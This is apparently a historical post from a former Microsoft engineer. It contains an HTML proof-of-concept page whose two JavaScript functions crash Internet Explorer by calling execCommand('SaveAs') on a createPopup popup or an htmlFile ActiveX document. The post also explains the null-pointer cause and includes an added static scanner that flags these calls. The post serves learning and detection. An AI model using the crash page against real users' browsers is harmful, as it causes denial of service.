Calling document.execCommand("SaveAs") on the document of a createPopup popup or an htmlFile ActiveX object crashes IE. Both off-screen document containers lack the necessary hosting context for the Save As dialog, leading to a null pointer dereference when the command tries to access the parent window.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>DOS_documentExecCommandSaveAs</TITLE></HEAD>
<BODY>
<SCRIPT LANGUAGE="JavaScript">
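// Case 1: call SaveAs on the document of a createPopup() popup object.
function crashThrough_createPopup()
{
    var myCrashPop=createPopup();
    myCrashPop.document.execCommand("SaveAs");
}
// Case 2: call SaveAs on an htmlFile ActiveX object, which is itself a document.
function crashThrough_AXhtmlFile()
{
    var myCrashAX=new ActiveXObject("htmlFile");
    myCrashAX.execCommand("SaveAs");
}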
</SCRIPT>
<FONT SIZE="2" FACE="Tahoma">
Two ways to crash the Browser using document.execCommand("SaveAs") inside a createPopup or an htmlFile<BR><BR>
<HR>
function <B>crashThrough_createPopup()</B><BR>
{<BR>
var myCrashPop=<FONT COLOR="BLUE"><B>createPopup()</B></FONT>;<BR>
myCrashPop.document.execCommand("SaveAs");<BR>
}<BR>
<HR>
function <B>crashThrough_AXhtmlFile()</B><BR>
{<BR>
var myCrashAX=new <FONT COLOR="BLUE"><B>ActiveXObject("htmlFile")</B></FONT>;<BR>
myCrashAX.execCommand("SaveAs");<BR>
}<BR>
<HR>
<BR>
<CENTER>
<INPUT TYPE="BUTTON" VALUE="crashThrough_createPopup()" ONCLICK="crashThrough_createPopup()">
<INPUT TYPE="BUTTON" VALUE="crashThrough_AXhtmlFile()" ONCLICK="crashThrough_AXhtmlFile()">
</CENTER>
</FONT>
</BODY>
</HTML>
The execCommand("SaveAs") handler needs to walk up to the top-level browser window to display the file save dialog. When the document belongs to a createPopup or htmlFile object, that walk reaches a null or invalid parent pointer and crashes.
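A static check for the two call patterns above, as an added example that is not part of the original post: it tracks variables bound to createPopup() or an htmlFile ActiveX object and reports execCommand("SaveAs") calls made through them. The function name `findOffscreenSaveAs`, the regex heuristics and the sample script are assumptions made for illustration.

```javascript
// Added example (not from the original post): heuristic scanner for script text.
// Flags execCommand("SaveAs") reached through a variable that holds a
// createPopup() object or an htmlFile ActiveX document.
function findOffscreenSaveAs(source) {
  const tainted = new Map(); // variable name -> kind of off-screen container
  let m;

  // x = createPopup(...)  or  x = window.createPopup(...)
  const popupRe = /([A-Za-z_$][\w$]*)\s*=\s*(?:window\.)?createPopup\s*\(/g;
  while ((m = popupRe.exec(source))) tainted.set(m[1], 'createPopup');

  // x = new ActiveXObject("htmlFile"); ProgIDs are case-insensitive.
  const axRe = /([A-Za-z_$][\w$]*)\s*=\s*new\s+ActiveXObject\s*\(\s*["']([^"']+)["']/g;
  while ((m = axRe.exec(source))) {
    if (m[2].toLowerCase() === 'htmlfile') tainted.set(m[1], 'htmlFile');
  }

  // base(.prop)*.execCommand("<command>"), reported when base is tainted.
  // Assumption: the command name is compared case-insensitively.
  const findings = [];
  const callRe = /([A-Za-z_$][\w$]*)((?:\.[A-Za-z_$][\w$]*)*)\.execCommand\s*\(\s*["']([^"']+)["']/g;
  while ((m = callRe.exec(source))) {
    const container = tainted.get(m[1]);
    if (container && m[3].toLowerCase() === 'saveas') {
      const line = source.slice(0, m.index).split('\n').length;
      findings.push({ line, variable: m[1], container });
    }
  }
  return findings;
}

// Constructed sample: the page's two call patterns plus two calls that
// must not be reported.
const SAMPLE = [
  'var myCrashPop=createPopup();',
  'myCrashPop.document.execCommand("SaveAs");',
  'var myCrashAX=new ActiveXObject("htmlFile");',
  'myCrashAX.execCommand("SaveAs");',
  'document.execCommand("SaveAs");',          // top-level document: ignored
  'myCrashPop.document.execCommand("Copy");', // different command: ignored
].join('\n');

console.log(findOffscreenSaveAs(SAMPLE));
```

This is a text-level heuristic: it does not follow aliases, reassignments or dynamically built command strings.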
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.